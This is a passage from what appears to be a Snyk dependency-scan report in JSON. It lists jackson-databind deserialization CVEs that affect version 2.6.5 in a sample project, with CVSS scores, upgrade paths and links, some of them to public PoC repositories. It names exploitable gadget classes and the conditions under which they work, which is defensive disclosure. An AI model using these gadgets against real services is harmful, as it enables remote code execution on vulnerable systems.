Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16943" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fmmc-742q-jg75" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:03:39.391997Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.024581Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2460", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:04.701685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", + "epssDetails": { + "percentile": "0.85119", + "probability": "0.01174", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17267" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f3j5-rmmp-3fc5" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-07T10:05:31.629572Z", + "functions_new": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-07T01:14:26Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-07T01:14:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.064844Z", + 
"socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Zhangxianhui" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Blog Post" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2498", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 
"2024-03-11T09:53:53.918541Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:58.282653Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", + "epssDetails": { + "percentile": "0.80301", + "probability": "0.00690", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17531" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-gjmw-vf9h-g25v" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-13T07:40:03.046000Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-12T21:52:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-13T07:41:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.918541Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "UltramanGaia" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2526", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + 
"cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:49.242419Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", + "epssDetails": { + "percentile": "0.79103", + "probability": "0.00622", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-20330" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-01-03T10:26:22.562970Z", + "functions_new": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-01-03T05:14:08Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-01-03T05:14:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.922905Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2620", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/jas502n/jackson-CVE-2020-8840", + "title": "Jackson PoC" + }, + { + "url": "https://github.com/jas502n/CVE-2020-8840", + "title": "PoC" + }, + { + "url": "https://github.com/Veraxy01/CVE-2020-8840", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "assigner": "NVD", + "severity": "critical", + 
"cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:13.011056Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", + "epssDetails": { + "percentile": "0.91001", + "probability": "0.03042", + "modelVersion": "v2023.03.01" + 